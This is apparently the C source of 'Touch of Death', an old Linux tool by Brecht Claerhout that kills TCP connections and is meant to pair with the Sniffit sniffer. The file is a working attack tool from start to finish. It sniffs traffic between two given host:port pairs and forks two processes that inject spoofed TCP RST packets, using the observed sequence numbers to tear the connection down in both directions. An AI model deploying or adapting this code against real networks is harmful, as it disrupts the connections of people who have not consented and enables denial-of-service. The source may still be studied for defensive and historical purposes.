/**************************************************************************/
/*                      Touch of Death (TOD V.1)                          */
/*                        By Brecht Claerhout                             */
/*                                                                        */
/* TOD is a TCP connection killer, designed for Sniffit V.0.3.4 and later */
/* TOD Version 1 is for LINUX only, maybe later I will port it.           */
/* PLEASE read TOD.README for proper instalation!                         */
/**************************************************************************/
/* Please Modify according to your setup                                  */
/**************************************************************************/

/* Put the correct interface you are using here.                          */
/* Other interfaces are also possible, as long as you find the correct    */
/* INTERFACE_PREFIX. (Shouldn't be to hard)                               */

/* The first Ethernet device.                                             */
#define INTERFACE	"eth0" 
#define INTERFACE_PREFIX 14  

/* Example for PPP (to use PPP)*/
/*
#define INTERFACE	"ppp0" 
#define INTERFACE_PREFIX 0  
*/

/* If you want to use the program standalone, a little feedback is       */
/* probably desired, define VERBOSE to get that feedback during          */
/* execution.                                                            */
/* For use with Sniffit only, it doesn't matter.                         */

/* #define VERBOSE */

/* seconds time before a connection is considered idle or dead.          */
#define IDLE	15     

/**************************************************************************/
/* Please Don't Modify anything below this line                           */
/**************************************************************************/
#include "tod_spoof.h"

#define VERSION		"1"

char SOURCE[100],DEST[100];
int SOURCE_P,DEST_P;

void H1_to_H2(void)
{
int i,stat,j;
int fd_send, fd_receive;
unsigned long sp_ack, sp_seq;
unsigned short flags;
struct sp_wait_packet pinfo;

fd_send = open_sending();
fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */

#ifdef VERBOSE
printf("trigger: %s -> %s started...\n",SOURCE,DEST);
#endif

for(i=1;i<=100;i++)
  {
  /* Waiting for a packet containing an ACK */
  stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,IDLE);
  if(stat==-1)  
	{
#ifdef VERBOSE
	printf("Connection 20 secs idle or dead...\n");
#endif
	exit(1);
	}
  sp_seq=pinfo.ack;
  sp_ack=0;
  j=0;
  /* Sending our fake Packet */
  	transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
							sp_seq+j,sp_ack,RST);
#ifdef VERBOSE
  printf("fired (Child 1)...\n");
#endif
  /* waiting for confirmation */
  stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,0,IDLE);
  if(stat<0)
      {
#ifdef VERBOSE
      printf("Connection 20 secs idle or dead...\n");
#endif
      exit(0);
      }  
  }
#ifdef VERBOSE
printf("I did not succeed in killing it.\n");
#endif
}

void H2_to_H1(void)
{
int i,stat,j;
int fd_send, fd_receive;
unsigned long sp_ack, sp_seq;
unsigned short flags;
struct sp_wait_packet pinfo;

fd_send = open_sending();
fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */

#ifdef VERBOSE
printf("trigger: %s -> %s started...\n",DEST,SOURCE);
#endif

for(i=1;i<=100;i++)
  {
  /* Waiting for a packet containing an ACK */
  stat=wait_packet(fd_receive,&pinfo,DEST,DEST_P,SOURCE,SOURCE_P,ACK,IDLE);
  if(stat==-1)  
	{
#ifdef VERBOSE
	printf("Connection 20 secs idle or dead...\n");
#endif
	exit(1);
	}
  sp_seq=pinfo.ack;
  sp_ack=0;
  j=0;
  /* Sending our fake Packet */
  	transmit_TCP (fd_send, NULL,0,0,0,SOURCE,SOURCE_P,DEST,DEST_P,
							sp_seq+j,sp_ack,RST);
#ifdef VERBOSE
  printf("fired (Child 2)...\n");
#endif
  /* waiting for confirmation */
  stat=wait_packet(fd_receive,&pinfo,DEST,DEST_P,SOURCE,SOURCE_P,0,IDLE);
  if(stat<0)
      {
#ifdef VERBOSE
      printf("Connection 20 secs idle or dead...\n");
#endif
      exit(0);
      }  
  }
#ifdef VERBOSE
printf("I did not succeed in killing it.\n");
#endif
}

void main(int argc, char *argv[])
{
int child1, child2;

if(argc != 5)
	{
#ifdef VERBOSE
	printf("usage: %s hos1t port1 host2 port2\n",argv[0]);
#endif
	exit(0);
	}
DEV_PREFIX = INTERFACE_PREFIX;
strcpy(SOURCE,argv[1]);
SOURCE_P=atoi(argv[2]);
strcpy(DEST,argv[3]);
DEST_P=atoi(argv[4]);

child1=fork();
if(child1==0)
  {
  H1_to_H2();
  exit(0);
  }  
child2=fork();
if(child2==0)
  {
  H2_to_H1(); 
  exit(0);
  }
wait();wait();
}
